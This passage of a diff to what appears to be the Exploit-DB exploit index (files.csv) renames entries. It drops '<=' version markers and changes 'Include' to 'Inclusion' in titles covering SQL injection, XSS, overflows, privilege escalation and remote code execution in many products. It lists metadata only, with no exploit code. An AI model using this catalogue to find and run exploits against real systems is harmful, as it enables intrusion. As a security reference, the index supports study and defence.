1.0 showads.php id Parameter SQL Injection",2008-12-02,Pouya_Server,php,webapps,0 32634,platforms/php/webapps/32634.txt,"Z1Exchange 1.0 showads.php id Parameter XSS",2008-12-02,Pouya_Server,php,webapps,0 32635,platforms/asp/webapps/32635.txt,"Jbook SQL Injection",2008-12-02,Pouya_Server,asp,webapps,0 @@ -29450,9 +29450,9 @@ id,file,description,date,author,platform,type,port 32674,platforms/multiple/remote/32674.cpp,"GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (2)",2008-12-05,"Jack Lloyd",multiple,remote,0 32675,platforms/linux/dos/32675.py,"QEMU 0.9 and KVM 36/79 VNC Server Remote Denial of Service",2008-12-22,"Alfredo Ortega",linux,dos,0 32676,platforms/php/webapps/32676.txt,"PECL Alternative PHP Cache Local 3 HTML Injection",2008-12-19,"Moritz Naumann",php,webapps,0 -32677,platforms/jsp/webapps/32677.txt,"Openfire <= 3.6.2 - 'group-summary.jsp' Cross-Site Scripting",2009-01-08,"Federico Muttis",jsp,webapps,0 -32678,platforms/jsp/webapps/32678.txt,"Openfire <= 3.6.2 - 'user-properties.jsp' Cross-Site Scripting",2009-01-08,"Federico Muttis",jsp,webapps,0 -32679,platforms/jsp/webapps/32679.txt,"Openfire <= 3.6.2 - 'log.jsp' Cross-Site Scripting",2009-01-08,"Federico Muttis",jsp,webapps,0 +32677,platforms/jsp/webapps/32677.txt,"Openfire 3.6.2 - 'group-summary.jsp' Cross-Site Scripting",2009-01-08,"Federico Muttis",jsp,webapps,0 +32678,platforms/jsp/webapps/32678.txt,"Openfire 3.6.2 - 'user-properties.jsp' Cross-Site Scripting",2009-01-08,"Federico Muttis",jsp,webapps,0 +32679,platforms/jsp/webapps/32679.txt,"Openfire 3.6.2 - 'log.jsp' Cross-Site Scripting",2009-01-08,"Federico Muttis",jsp,webapps,0 32680,platforms/jsp/webapps/32680.txt,"Openfire 3.6.2 - 'log.jsp' Directory Traversal",2009-01-08,"Federico Muttis",jsp,webapps,0 32681,platforms/hardware/remote/32681.txt,"COMTREND CT-536 and HG-536 Routers Multiple Remote Vulnerabilities",2008-12-22,"Daniel Fernandez Bleda",hardware,remote,0 32682,platforms/linux/dos/32682.c,"Linux Kernel 2.6.x - 'qdisc_run()' Local Denial of Service",2008-12-23,"Herbert Xu",linux,dos,0 @@ -29466,7 +29466,7 @@ id,file,description,date,author,platform,type,port 32690,platforms/linux/remote/32690.txt,"xterm DECRQSS Remote Command Execution",2008-12-29,"Paul Szabo",linux,remote,0 32691,platforms/linux/remote/32691.txt,"Audio File Library 0.2.6 - (libaudiofile) 'msadpcm.c' WAV File Processing Buffer Overflow",2008-12-30,"Anton Khirnov",linux,remote,0 32692,platforms/hardware/dos/32692.txt,"Symbian S60 Malformed SMS/Mms Remote Denial Of Service",2008-12-30,"Tobias Engel",hardware,dos,0 -32693,platforms/php/local/32693.php,"suPHP <= 0.7 - 'suPHP_ConfigPath' Safe Mode Restriction-Bypass",2008-12-31,Mr.SaFa7,php,local,0 +32693,platforms/php/local/32693.php,"suPHP 0.7 - 'suPHP_ConfigPath' Safe Mode Restriction-Bypass",2008-12-31,Mr.SaFa7,php,local,0 32694,platforms/osx/dos/32694.pl,"Apple Safari 3.2 WebKit 'alink' Property Memory Leak Remote Denial of Service (1)",2009-01-01,"Jeremy Brown",osx,dos,0 32695,platforms/osx/dos/32695.php,"Apple Safari 3.2 WebKit 'alink' Property Memory Leak Remote Denial of Service (2)",2009-01-01,Pr0T3cT10n,osx,dos,0 32696,platforms/linux/dos/32696.txt,"KDE Konqueror 4.1 - Multiple Cross-Site Scripting and Denial of Service Vulnerabilities",2009-01-02,athos,linux,dos,0 @@ -29487,14 +29487,14 @@ id,file,description,date,author,platform,type,port 32712,platforms/multiple/dos/32712.txt,"IBM WebSphere DataPower XML Security Gateway 3.6.1 XS40 - Remote Denial Of Service",2009-01-08,Erik,multiple,dos,0 32713,platforms/php/webapps/32713.txt,"tadbook2 Module for XOOPS 'open_book.php' SQL Injection",2009-01-07,stylextra,php,webapps,0 32714,platforms/php/webapps/32714.txt,"Visuplay CMS - Multiple SQL Injection Vulnerabilities",2009-01-12,"Joseph Giron",php,webapps,0 -32715,platforms/php/dos/32715.php,"PHP <= 5.2.8 - 'popen()' Function Buffer Overflow",2009-01-12,e.wiZz!,php,dos,0 +32715,platforms/php/dos/32715.php,"PHP 5.2.8 - 'popen()' Function Buffer Overflow",2009-01-12,e.wiZz!,php,dos,0 32716,platforms/asp/webapps/32716.html,"Comersus Cart 6 User Email and User Password Unauthorized Access",2009-01-12,ajann,asp,webapps,0 32718,platforms/php/webapps/32718.txt,"Ovidentia 6.7.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-01-12,"Ivan Sanchez",php,webapps,0 32721,platforms/php/webapps/32721.txt,"XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities",2014-04-07,hackerDesk,php,webapps,0 32723,platforms/hardware/remote/32723.txt,"Cisco IOS 12.x HTTP Server Multiple Cross-Site Scripting Vulnerabilities",2009-01-14,"Adrian Pastor",hardware,remote,0 32724,platforms/php/webapps/32724.txt,"Dark Age CMS 2.0 - 'login.php' SQL Injection",2009-01-14,darkjoker,php,webapps,0 32725,platforms/windows/remote/32725.rb,"JIRA Issues Collector - Directory Traversal",2014-04-07,Metasploit,windows,remote,8080 -32726,platforms/linux/dos/32726.txt,"Ganglia gmetad <= 3.0.6 - 'process_path()' Remote Stack Buffer Overflow",2009-01-15,"Spike Spiegel",linux,dos,0 +32726,platforms/linux/dos/32726.txt,"Ganglia gmetad 3.0.6 - 'process_path()' Remote Stack Buffer Overflow",2009-01-15,"Spike Spiegel",linux,dos,0 32727,platforms/php/webapps/32727.txt,"MKPortal 1.2.1 - /modules/blog/index.php Home Template Textarea SQL Injection",2009-01-15,waraxe,php,webapps,0 32728,platforms/php/webapps/32728.txt,"MKPortal 1.2.1 - /modules/rss/handler_image.php i Parameter XSS",2009-01-15,waraxe,php,webapps,0 32729,platforms/asp/webapps/32729.txt,"LinksPro 'OrderDirection' Parameter SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0 @@ -29512,10 +29512,10 @@ id,file,description,date,author,platform,type,port 32742,platforms/jsp/webapps/32742.txt,"Apache Jackrabbit 1.4/1.5 Content Repository (JCR) swr.jsp q Parameter XSS",2009-01-20,"Red Hat",jsp,webapps,0 32743,platforms/hardware/remote/32743.txt,"Halon Security Router (SR) 3.2-winter-r1 - Multiple Security Vulnerabilities",2014-04-08,"Juan Manuel Garcia",hardware,remote,0 32745,platforms/multiple/remote/32745.py,"OpenSSL TLS Heartbeat Extension - Memory Disclosure",2014-04-08,"Jared Stafford",multiple,remote,443 -32746,platforms/cgi/webapps/32746.txt,"MoinMoin <= 1.8 - 'AttachFile.py' Cross-Site Scripting",2009-01-20,SecureState,cgi,webapps,0 +32746,platforms/cgi/webapps/32746.txt,"MoinMoin 1.8 - 'AttachFile.py' Cross-Site Scripting",2009-01-20,SecureState,cgi,webapps,0 32747,platforms/php/webapps/32747.txt,"PHP-Nuke Downloads Module 'url' Parameter SQL Injection",2009-01-23,"Sina Yazdanmehr",php,webapps,0 32748,platforms/asp/webapps/32748.txt,"BBSXP 5.13 - 'error.asp' Cross-Site Scripting",2009-01-23,arashps0,asp,webapps,0 -32749,platforms/linux/dos/32749.txt,"Pidgin <= 2.4.2 - 'msn_slplink_process_msg()' Denial of Service",2009-01-26,"Juan Pablo Lopez Yacubian",linux,dos,0 +32749,platforms/linux/dos/32749.txt,"Pidgin 2.4.2 - 'msn_slplink_process_msg()' Denial of Service",2009-01-26,"Juan Pablo Lopez Yacubian",linux,dos,0 32750,platforms/asp/webapps/32750.txt,"OBLOG 'err.asp' Cross-Site Scripting",2009-01-23,arash.setayeshi,asp,webapps,0 32751,platforms/linux/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",linux,local,0 32752,platforms/windows/local/32752.rb,"WinRAR Filename Spoofing",2014-04-08,Metasploit,windows,local,0 @@ -29525,10 +29525,10 @@ id,file,description,date,author,platform,type,port 32756,platforms/asp/webapps/32756.txt,"LDF 'login.asp' SQL Injection",2009-01-26,"Arash Setayeshi",asp,webapps,0 32757,platforms/php/webapps/32757.txt,"ConPresso CMS 4.07 - Multiple Remote Vulnerabilities",2009-01-26,"David Vieira-Kurz",php,webapps,0 32758,platforms/asp/webapps/32758.txt,"Lootan 'login.asp' SQL Injection",2009-01-26,"Arash Setayeshi",asp,webapps,0 -32759,platforms/php/webapps/32759.txt,"OpenX <= 2.6.2 - 'MAX_type' Parameter Local File Include",2009-01-26,"Sarid Harper",php,webapps,0 +32759,platforms/php/webapps/32759.txt,"OpenX 2.6.2 - 'MAX_type' Parameter Local File Inclusion",2009-01-26,"Sarid Harper",php,webapps,0 32760,platforms/php/webapps/32760.txt,"NewsCMSLite Insecure Cookie Authentication Bypass",2009-01-24,FarhadKey,php,webapps,0 32761,platforms/windows/dos/32761.pl,"Apple Safari For Windows 3.2.1 Malformed URI Remote Denial Of Service",2009-01-27,Lostmon,windows,dos,0 -32762,platforms/multiple/remote/32762.pl,"Sun Java System Access Manager <= 7.1 Username Enumeration Weakness",2009-01-27,"Marco Mella",multiple,remote,0 +32762,platforms/multiple/remote/32762.pl,"Sun Java System Access Manager 7.1 Username Enumeration Weakness",2009-01-27,"Marco Mella",multiple,remote,0 32764,platforms/multiple/remote/32764.py,"OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)",2014-04-09,"Fitzl Csaba",multiple,remote,443 32765,platforms/multiple/webapps/32765.txt,"csUpload Script Site - Authentication Bypass",2014-04-09,Satanic2000,multiple,webapps,0 32766,platforms/php/webapps/32766.txt,"Autonomy Ultraseek 'cs.html' URI Redirection",2009-01-28,buzzy,php,webapps,0 @@ -29538,7 +29538,7 @@ id,file,description,date,author,platform,type,port 32770,platforms/php/webapps/32770.txt,"E-Php B2B Trading Marketplace Script Multiple Cross-Site Scripting Vulnerabilities",2009-01-30,SaiedHacker,php,webapps,0 32771,platforms/windows/local/32771.txt,"Multiple Kaspersky Products 'klim5.sys' - Local Privilege Escalation",2009-02-02,"Ruben Santamarta ",windows,local,0 32772,platforms/windows/dos/32772.py,"Nokia Multimedia Player 1.1 - (.m3u) Heap Buffer Overflow",2009-02-03,zer0in,windows,dos,0 -32773,platforms/php/webapps/32773.txt,"Simple Machines Forum <= 1.1.7 - '[url]' Tag HTML Injection",2009-02-03,Xianur0,php,webapps,0 +32773,platforms/php/webapps/32773.txt,"Simple Machines Forum 1.1.7 - '[url]' Tag HTML Injection",2009-02-03,Xianur0,php,webapps,0 32774,platforms/multiple/dos/32774.txt,"QIP 2005 Malformed Rich Text Message Remote Denial of Service",2009-02-04,ShineShadow,multiple,dos,0 32775,platforms/linux/dos/32775.txt,"Linux Kernel 2.6.x - 'make_indexed_dir()' Local Denial of Service",2009-02-16,"Sami Liedes",linux,dos,0 32776,platforms/hardware/remote/32776.txt,"Cisco IOS 12.4(23) HTTP Server Multiple Cross-Site Scripting Vulnerabilities",2009-02-04,Zloss,hardware,remote,0 @@ -29568,9 +29568,9 @@ id,file,description,date,author,platform,type,port 32801,platforms/hardware/remote/32801.txt,"Barracuda Load Balancer 'realm' Parameter Cross-Site Scripting",2009-02-05,"Jan Skovgren",hardware,remote,0 32802,platforms/php/webapps/32802.txt,"ClipBucket 1.7 - 'dwnld.php' Directory Traversal",2009-02-16,JIKO,php,webapps,0 32803,platforms/php/webapps/32803.txt,"A4Desk Event Calendar 'eventid' Parameter SQL Injection",2008-10-01,r45c4l,php,webapps,0 -32804,platforms/php/webapps/32804.txt,"lastRSS autoposting bot MOD 0.1.3 - 'phpbb_root_path' Parameter Remote File Include",2009-02-20,Kacper,php,webapps,0 +32804,platforms/php/webapps/32804.txt,"lastRSS autoposting bot MOD 0.1.3 - 'phpbb_root_path' Parameter Remote File Inclusion",2009-02-20,Kacper,php,webapps,0 32805,platforms/linux/local/32805.c,"Linux Kernel 2.6.x - 'sock.c' SO_BSDCOMPAT Option Information Disclosure",2009-02-20,"Clément Lecigne",linux,local,0 -32806,platforms/php/webapps/32806.txt,"Blue Utopia 'index.php' Local File Include",2009-02-22,PLATEN,php,webapps,0 +32806,platforms/php/webapps/32806.txt,"Blue Utopia 'index.php' Local File Inclusion",2009-02-22,PLATEN,php,webapps,0 32807,platforms/php/webapps/32807.txt,"Joomla! and Mambo gigCalendar Component 1.0 - 'banddetails.php' SQL Injection",2009-02-23,"Salvatore Fresta",php,webapps,0 32808,platforms/php/webapps/32808.txt,"Magento 1.2 - app/code/core/Mage/Admin/Model/Session.php login[username] Parameter XSS",2009-02-24,"Loukas Kalenderidis",php,webapps,0 32809,platforms/php/webapps/32809.txt,"Magento 1.2 app/code/core/Mage/Adminhtml/controllers/IndexController.php email Parameter XSS",2009-02-24,"Loukas Kalenderidis",php,webapps,0 @@ -29589,7 +29589,7 @@ id,file,description,date,author,platform,type,port 32824,platforms/windows/dos/32824.pl,"Internet Download Manager 5.15 Build 3 - Language File Parsing Buffer Overflow",2009-02-27,"musashi karak0rsan",windows,dos,0 32825,platforms/linux/remote/32825.txt,"djbdns 1.05 Long Response Packet Remote Cache Poisoning",2009-02-27,"Matthew Dempsky",linux,remote,0 32826,platforms/windows/remote/32826.html,"iDefense COMRaider Active X Control 'write()' Arbitrary File Overwrite",2009-03-02,"Amir Zangeneh",windows,remote,0 -32813,platforms/osx/local/32813.c,"Apple Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Privilege Escalation Exploit",2014-04-11,"Kenzley Alphonse",osx,local,0 +32813,platforms/osx/local/32813.c,"Apple Mac OS X Lion Kernel xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Privilege Escalation Exploit",2014-04-11,"Kenzley Alphonse",osx,local,0 32827,platforms/php/webapps/32827.txt,"Afian 'includer.php' Directory Traversal",2009-03-02,vnbrain.net,php,webapps,0 32828,platforms/php/webapps/32828.txt,"Yektaweb Academic Web Tools CMS 1.4.2.8/1.5.7 - Multiple Cross-Site Scripting Vulnerabilities",2009-03-02,Isfahan,php,webapps,0 32829,platforms/linux/local/32829.c,"Linux Kernel 2.6.x - 'seccomp' System Call Security Bypass",2009-03-02,"Chris Evans",linux,local,0 @@ -29597,11 +29597,11 @@ id,file,description,date,author,platform,type,port 32831,platforms/php/webapps/32831.txt,"Microweber CMS 0.93 - CSRF",2014-04-13,sajith,php,webapps,0 32832,platforms/windows/remote/32832.c,"NovaStor NovaNET 12 - 'DtbClsLogin()' Remote Stack Buffer Overflow",2009-03-02,"AbdulAziz Hariri",windows,remote,0 32833,platforms/asp/webapps/32833.txt,"Blogsa 1.0 - 'Widgets.aspx' Cross-Site Scripting",2009-03-02,DJR,asp,webapps,0 -32834,platforms/linux/remote/32834.txt,"cURL/libcURL <= 7.19.3 HTTP 'Location:' Redirect Security Bypass",2009-03-03,"David Kierznowski",linux,remote,0 +32834,platforms/linux/remote/32834.txt,"cURL/libcURL 7.19.3 HTTP 'Location:' Redirect Security Bypass",2009-03-03,"David Kierznowski",linux,remote,0 32835,platforms/php/webapps/32835.txt,"NovaBoard 1.0 HTML Injection and Cross-Site Scripting Vulnerabilities",2009-03-03,"Jose Luis Zayas",php,webapps,0 32836,platforms/multiple/dos/32836.html,"Mozilla Firefox 2.0.x Nested 'window.print()' Denial of Service",2009-03-03,b3hz4d,multiple,dos,0 32837,platforms/linux/remote/32837.py,"Wesnoth 1.x PythonAI Remote Code Execution",2009-02-25,Wesnoth,linux,remote,0 -32838,platforms/linux/dos/32838.txt,"MySQL <= 6.0.9 XPath Expression Remote Denial Of Service",2009-02-14,"Shane Bester",linux,dos,0 +32838,platforms/linux/dos/32838.txt,"MySQL 6.0.9 XPath Expression Remote Denial Of Service",2009-02-14,"Shane Bester",linux,dos,0 32839,platforms/multiple/remote/32839.txt,"IBM WebSphere Application Server 6.1/7.0 Administrative Console Cross-Site Scripting",2009-02-26,IBM,multiple,remote,0 32840,platforms/php/webapps/32840.txt,"Amoot Web Directory - Password Field SQL Injection",2009-03-05,Pouya_Server,php,webapps,0 32841,platforms/php/webapps/32841.txt,"CMSCart 1.04 - 'maindatafunctions.php' SQL Injection",2009-02-28,"John Martinelli",php,webapps,0 @@ -29612,7 +29612,7 @@ id,file,description,date,author,platform,type,port 32846,platforms/php/webapps/32846.txt,"Nenriki CMS 0.5 - 'ID' Cookie SQL Injection",2009-03-10,x0r,php,webapps,0 32847,platforms/multiple/local/32847.txt,"PostgreSQL 8.3.6 Low Cost Function Information Disclosure",2009-03-10,"Andres Freund",multiple,local,0 32848,platforms/linux/local/32848.txt,"Sun xVM VirtualBox 2.0/2.1 - Local Privilege Escalation",2009-03-10,"Sun Microsystems",linux,local,0 -32849,platforms/linux/dos/32849.txt,"PostgreSQL <= 8.3.6 - Conversion Encoding Remote Denial of Service",2009-03-11,"Afonin Denis",linux,dos,0 +32849,platforms/linux/dos/32849.txt,"PostgreSQL 8.3.6 - Conversion Encoding Remote Denial of Service",2009-03-11,"Afonin Denis",linux,dos,0 32850,platforms/windows/local/32850.txt,"Multiple SlySoft Products - Driver IOCTL Request Multiple Local Buffer Overflow Vulnerabilities",2009-03-12,"Nikita Tarakanov",windows,local,0 32851,platforms/windows/remote/32851.html,"Microsoft Internet Explorer 10 - CMarkup Use-After-Free (MS14-012)",2014-04-14,"Jean-Jamil Khalife",windows,remote,0 32852,platforms/php/webapps/32852.txt,"TikiWiki 2.2/3.0 - 'tiki-galleries.php' Cross-Site Scripting",2009-03-12,iliz,php,webapps,0 @@ -29633,14 +29633,14 @@ id,file,description,date,author,platform,type,port 32867,platforms/php/webapps/32867.txt,"WordPress Quick Page/Post Redirect Plugin 5.0.3 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80 32868,platforms/php/webapps/32868.txt,"WordPress Twitget Plugin 3.3.1 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80 32869,platforms/linux/webapps/32869.rb,"eScan Web Management Console Command Injection",2014-04-14,Metasploit,linux,webapps,10080 -32870,platforms/cgi/webapps/32870.txt,"AWStats <= 6.4 - 'awstats.pl' Multiple Path Disclosure",2009-04-19,r0t,cgi,webapps,0 +32870,platforms/cgi/webapps/32870.txt,"AWStats 6.4 - 'awstats.pl' Multiple Path Disclosure",2009-04-19,r0t,cgi,webapps,0 32871,platforms/php/webapps/32871.txt,"ExpressionEngine 1.6 Avtaar Name HTML Injection",2009-03-22,"Adam Baldwin",php,webapps,0 32872,platforms/php/webapps/32872.txt,"PHPizabi 0.8 - 'notepad_body' Parameter SQL Injection",2009-03-24,Nine:Situations:Group::bookoo,php,webapps,0 32873,platforms/php/webapps/32873.txt,"PHPCMS2008 - 'ask/search_ajax.php' SQL Injection",2009-03-17,anonymous,php,webapps,0 32874,platforms/asp/webapps/32874.txt,"BlogEngine.NET 1.4 - 'search.aspx' Cross-Site Scripting",2009-04-01,sk,asp,webapps,0 32875,platforms/php/webapps/32875.txt,"Comparison Engine Power 1.0 - 'product.comparision.php' SQL Injection",2009-03-25,SirGod,php,webapps,0 32876,platforms/novell/remote/32876.txt,"Novell NetStorage 2.0.1/3.1.5 - Multiple Remote Vulnerabilities",2009-03-26,"Bugs NotHugs",novell,remote,0 -32877,platforms/multiple/remote/32877.txt,"Xlight FTP Server <= 3.2 - 'user' SQL Injection",2009-03-19,fla,multiple,remote,0 +32877,platforms/multiple/remote/32877.txt,"Xlight FTP Server 3.2 - 'user' SQL Injection",2009-03-19,fla,multiple,remote,0 32878,platforms/hardware/remote/32878.txt,"Cisco ASA Appliance 7.x/8.0 WebVPN Cross-Site Scripting",2009-03-31,"Bugs NotHugs",hardware,remote,0 32879,platforms/windows/remote/32879.html,"SAP MaxDB 7.4/7.6 - 'webdbm' Multiple Cross-Site Scripting Vulnerabilities",2009-03-31,"Digital Security Research Group",windows,remote,0 32880,platforms/php/webapps/32880.txt,"Turnkey eBook Store 1.1 - 'keywords' Parameter Cross-Site Scripting",2009-03-31,TEAMELITE,php,webapps,0 @@ -29651,14 +29651,14 @@ id,file,description,date,author,platform,type,port 32885,platforms/unix/remote/32885.rb,"Unitrends Enterprise Backup 7.3.0 - Unauthenticated Root RCE (Metasploit)",2014-04-15,"Brandon Perry",unix,remote,443 32886,platforms/hardware/webapps/32886.txt,"Xerox DocuShare - SQL Injection",2014-04-15,"Brandon Perry",hardware,webapps,8080 32888,platforms/asp/webapps/32888.txt,"Asbru Web Content Management 6.5/6.6.9 SQL Injection and Cross-Site Scripting Vulnerabilities",2009-04-02,"Patrick Webster",asp,webapps,0 -32889,platforms/php/webapps/32889.txt,"4CMS - SQL Injection and Local File Include Vulnerabilities",2009-04-02,k1ll3r_null,php,webapps,0 +32889,platforms/php/webapps/32889.txt,"4CMS - SQL Injection and Local File Inclusion Vulnerabilities",2009-04-02,k1ll3r_null,php,webapps,0 32891,platforms/windows/local/32891.txt,"Microsoft Windows XP/2003/Vista/2008 - WMI Service Isolation Local Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Local Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 32893,platforms/windows/local/32893.txt,"Microsoft Windows VISTA/2008 - Thread Pool ACL Local Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 32894,platforms/multiple/webapps/32894.txt,"IBM BladeCenter Advanced Management Module 1.42 Login username XSS",2009-04-09,"Henri Lindberg",multiple,webapps,0 32895,platforms/multiple/webapps/32895.txt,"IBM BladeCenter Advanced Management Module 1.42 - private/file_management.ssi PATH Parameter XSS",2009-04-09,"Henri Lindberg",multiple,webapps,0 32896,platforms/multiple/webapps/32896.html,"IBM BladeCenter Advanced Management Module 1.42 - CSRF",2009-04-09,"Henri Lindberg",multiple,webapps,0 -32897,platforms/java/webapps/32897.txt,"Cisco Subscriber Edge Services Manager Cross-Site Scripting And HTML Injection Vulnerabilities",2009-04-09,"Usman Saeed",java,webapps,0 +32897,platforms/java/webapps/32897.txt,"Cisco Subscriber Edge Services Manager - Cross-Site Scripting And HTML Injection Vulnerabilities",2009-04-09,"Usman Saeed",java,webapps,0 32898,platforms/asp/webapps/32898.txt,"XIGLA Absolute Form Processor XE 1.5 - 'login.asp' SQL Injection",2009-04-09,"ThE g0bL!N",asp,webapps,0 32899,platforms/windows/dos/32899.py,"Jzip - SEH Unicode Buffer Overflow (Denial of Service)",2014-04-16,"motaz reda",windows,dos,0 32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL 'safe_mode' and 'open_basedir' Restriction-Bypass",2009-04-10,"Maksymilian Arciemowicz",php,local,0 @@ -29673,7 +29673,7 @@ id,file,description,date,author,platform,type,port 32911,platforms/php/webapps/32911.txt,"Phorum 5.2 admin/banlist.php curr Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0 32912,platforms/php/webapps/32912.txt,"Phorum 5.2 admin/users.php Multiple Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0 32913,platforms/php/webapps/32913.txt,"Phorum 5.2 - versioncheck.php upgrade_available Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0 -32914,platforms/php/webapps/32914.php,"Geeklog <= 1.5.2 - 'usersettings.php' SQL Injection",2009-04-16,Nine:Situations:Group::bookoo,php,webapps,0 +32914,platforms/php/webapps/32914.php,"Geeklog 1.5.2 - 'usersettings.php' SQL Injection",2009-04-16,Nine:Situations:Group::bookoo,php,webapps,0 32998,platforms/multiple/remote/32998.c,"Heartbleed OpenSSL - Information Leak Exploit (2) DTLS Support",2014-04-24,"Ayman Sagy",multiple,remote,0 32997,platforms/windows/remote/32997.pl,"Acunetix 8 build 20120704 - Remote Stack Based Overflow",2014-04-24,An7i,windows,remote,0 32919,platforms/hardware/remote/32919.txt,"SAP Router - Timing Attack Password Disclosure",2014-04-17,"Core Security",hardware,remote,0 @@ -29682,10 +29682,10 @@ id,file,description,date,author,platform,type,port 32922,platforms/multiple/remote/32922.html,"Apache Geronimo 2.1.x - Multiple Admin Function CSRF",2009-04-16,DSecRG,multiple,remote,0 32923,platforms/windows/remote/32923.cs,"MiniWeb 0.8.19 - Remote Buffer Overflow",2009-04-16,e.wiZz!,windows,remote,0 32924,platforms/php/webapps/32924.txt,"razorCMS 0.3RC2 - Multiple Vulnerabilities",2009-04-16,"Jeremi Gosney",php,webapps,0 -32925,platforms/multiple/remote/32925.txt,"NRPE <= 2.15 - Remote Command Execution",2014-04-18,"Dawid Golunski",multiple,remote,0 +32925,platforms/multiple/remote/32925.txt,"NRPE 2.15 - Remote Command Execution",2014-04-18,"Dawid Golunski",multiple,remote,0 32926,platforms/linux/dos/32926.c,"Linux group_info refcounter - Overflow Memory Corruption",2014-04-18,"Thomas Pollet",linux,dos,0 32927,platforms/java/webapps/32927.txt,"BlackBerry Enterprise Server 4.0/4.1 MDS Connection Service Cross-Site Scripting",2009-04-16,"Ken Millar",java,webapps,0 -32928,platforms/php/webapps/32928.txt,"Malleo 1.2.3 - 'admin.php' Local File Include",2009-04-17,Drosophila,php,webapps,0 +32928,platforms/php/webapps/32928.txt,"Malleo 1.2.3 - 'admin.php' Local File Inclusion",2009-04-17,Drosophila,php,webapps,0 32929,platforms/linux/remote/32929.txt,"Red Hat Stronghold Web Server 2.3 - Cross-Site Scripting",2009-04-20,"Xia Shing Zee",linux,remote,0 32930,platforms/php/webapps/32930.txt,"CMSimple 4.4/4.4.2 - Remote File Inclusion",2014-04-18,NoGe,php,webapps,80 32931,platforms/hardware/remote/32931.html,"Linksys WRT54GC 1.5.7 - (Firmware) 'administration.cgi' Access Validation",2009-04-20,"Gabriel Lima",hardware,remote,0 @@ -29703,8 +29703,8 @@ id,file,description,date,author,platform,type,port 32943,platforms/hardware/webapps/32943.txt,"Teracom Modem T2-B-Gawv1.4U10Y-BI - CSRF",2014-04-20,"Rakesh S",hardware,webapps,0 32944,platforms/multiple/remote/32944.txt,"SAP cFolders Cross-Site Scripting And HTML Injection Vulnerabilities",2009-04-21,"Digital Security Research Group",multiple,remote,0 32945,platforms/multiple/remote/32945.txt,"010 Editor 3.0.4 File Parsing Multiple Buffer Overflow Vulnerabilities",2009-04-21,"Le Duc Anh",multiple,remote,0 -32946,platforms/freebsd/local/32946.c,"FreeBSD <= 7.1 libc Berkley DB Interface Uninitialized Memory Local Information Disclosure",2009-01-15,"Jaakko Heinonen",freebsd,local,0 -32947,platforms/linux/local/32947.txt,"DirectAdmin <= 1.33.3 - '/CMD_DB' Backup Action Insecure Temporary File Creation",2009-04-22,anonymous,linux,local,0 +32946,platforms/freebsd/local/32946.c,"FreeBSD 7.1 libc Berkley DB Interface Uninitialized Memory Local Information Disclosure",2009-01-15,"Jaakko Heinonen",freebsd,local,0 +32947,platforms/linux/local/32947.txt,"DirectAdmin 1.33.3 - '/CMD_DB' Backup Action Insecure Temporary File Creation",2009-04-22,anonymous,linux,local,0 32948,platforms/php/webapps/32948.txt,"New5starRating 1.0 - 'admin/control_panel_sample.php' SQL Injection",2009-04-22,zer0day,php,webapps,0 32949,platforms/multiple/dos/32949.txt,"Mani's Admin Plugin Remote Denial Of Service",2009-04-22,M4rt1n,multiple,dos,0 32950,platforms/php/webapps/32950.txt,"Flat Calendar 1.1 - 'add.php' HTML Injection",2009-04-22,ZoRLu,php,webapps,0 @@ -29721,14 +29721,14 @@ id,file,description,date,author,platform,type,port 32960,platforms/php/webapps/32960.txt,"Invision Power Board 3.0 - Multiple HTML-Injection and Information Disclosure Vulnerabilities",2009-04-27,brain[pillow],php,webapps,0 32961,platforms/linux/dos/32961.html,"Mozilla Firefox 3.0.9 - 'nsTextFrame::ClearTextRun()' Remote Memory Corruption",2009-04-27,"Marc Gueury",linux,dos,0 32962,platforms/cgi/remote/32962.txt,"LevelOne AMG-2000 2.00.00 Security Bypass",2009-04-29,J.Greil,cgi,remote,0 -32963,platforms/php/webapps/32963.txt,"Coppermine Photo Gallery <= 1.4.21 - 'css' Parameter Cross-Site Scripting",2009-04-29,"Gerendi Sandor Attila",php,webapps,0 +32963,platforms/php/webapps/32963.txt,"Coppermine Photo Gallery 1.4.21 - 'css' Parameter Cross-Site Scripting",2009-04-29,"Gerendi Sandor Attila",php,webapps,0 32964,platforms/linux/dos/32964.c,"GnuTLS 2.6.x libgnutls lib/pk-libgcrypt.c Malformed DSA Key Handling Remote DoS",2009-04-30,"Miroslav Kratochvil",linux,dos,0 32965,platforms/linux/remote/32965.c,"GnuTLS 2.6.x libgnutls lib/gnutls_pk.c DSA Key Storage Remote Spoofing",2009-04-30,"Miroslav Kratochvil",linux,remote,0 32966,platforms/php/webapps/32966.txt,"MyBB 1.4.5 - Multiple Security Vulnerabilities",2009-05-03,"Jacques Copeau",php,webapps,0 32967,platforms/multiple/remote/32967.txt,"Openfire 3.x jabber:iq:auth 'passwd_change' Remote Password Change",2009-05-04,"Daryl Herzmann",multiple,remote,0 32968,platforms/php/webapps/32968.sh,"IceWarp Merak Mail Server 9.4.1 Groupware Component Multiple SQL Injection Vulnerabilities",2009-05-05,"RedTeam Pentesting",php,webapps,0 32969,platforms/php/webapps/32969.txt,"IceWarp Merak Mail Server 9.4.1 - 'cleanHTML()' Function Cross-Site Scripting",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 -33077,platforms/linux/dos/33077.c,"MySQL <= 5.0.75 - 'sql_parse.cc' Multiple Format String Vulnerabilities",2009-06-08,kingcope,linux,dos,0 +33077,platforms/linux/dos/33077.c,"MySQL 5.0.75 - 'sql_parse.cc' Multiple Format String 